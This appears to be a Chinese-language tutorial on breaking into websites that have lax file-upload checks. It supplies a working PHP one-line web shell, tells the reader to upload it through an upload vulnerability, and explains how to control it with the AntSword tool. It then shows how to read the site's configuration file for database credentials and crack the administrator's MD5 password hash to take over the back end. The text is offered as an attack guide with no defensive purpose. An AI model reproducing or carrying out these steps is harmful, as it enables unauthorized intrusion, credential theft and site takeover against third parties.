网站前提条件

网站有文件上传的入口（如b站的视频上传），且网站文件上传的检查不严，没有d盾或者安全狗等其他安全工具

准备工具

中国蚁剑(antSword)（下载链接：https://github.com/AntSwordProject ）

教程

制作木马

先新建一个文本文档，然后编辑文档吧第一行改为<?php eval($_POST['ant']); ?>（ant表示连接密码，可以更改），然后保存，然后把文本文档文件后缀改成.php

把编辑好的文件通过文件上传漏洞进行上传，如果不知道上传路径可以用Burp Suite软件进行抓包查看上传路径

进行连接

下载文件AntSword-Loader-v4.0.3-win32-x64.zip和antSword.zip并全部解压

打开AntSword-Loader-v4.0.3-win32-x64文件夹中的AntSword.exe

点击初始化，然后选择已经解压的antSword文件，点击确定，等待一会

进入主界面后，右键软件空白处，点击添加数据

在URL地址一栏输入之前文件上传的url路径，然后在连接密码输入ant(如果你更改了上面的代码那你就使用你更改后的代码),至于编码器的话···如果你想要不用安全就用default，其他的不动，然后点击上面的添加

双击刚刚添加的数据，如果成功打开就代表成功了，如果失败了就代表哪里出现错误了或者网站防御高

获取后台权限

我们连接后继续查找网站配置文件，我们打开网站的根目录，然后在路径栏内容后面输入/includes/，回车，可以看到里面有configure.php文件（如果没有，可以去看相应的网站结构手册或者去搜索引擎搜索“xxx网站配置文件路径”），双击文件，然后点击上方的编辑.查找数据，然后在下方输入database，然后回车，然后下面的后面的就是数据库名称账号密码了，我们登录数据库，

找到<前缀>userinfo（如果没有，可以去看相应的网站结构手册或者去搜索引擎搜索“xxx网站数据库密码文件路径”）,点击进入

把第一个数据的md5解密，然后获取密码登录后台

（没了）

TNE END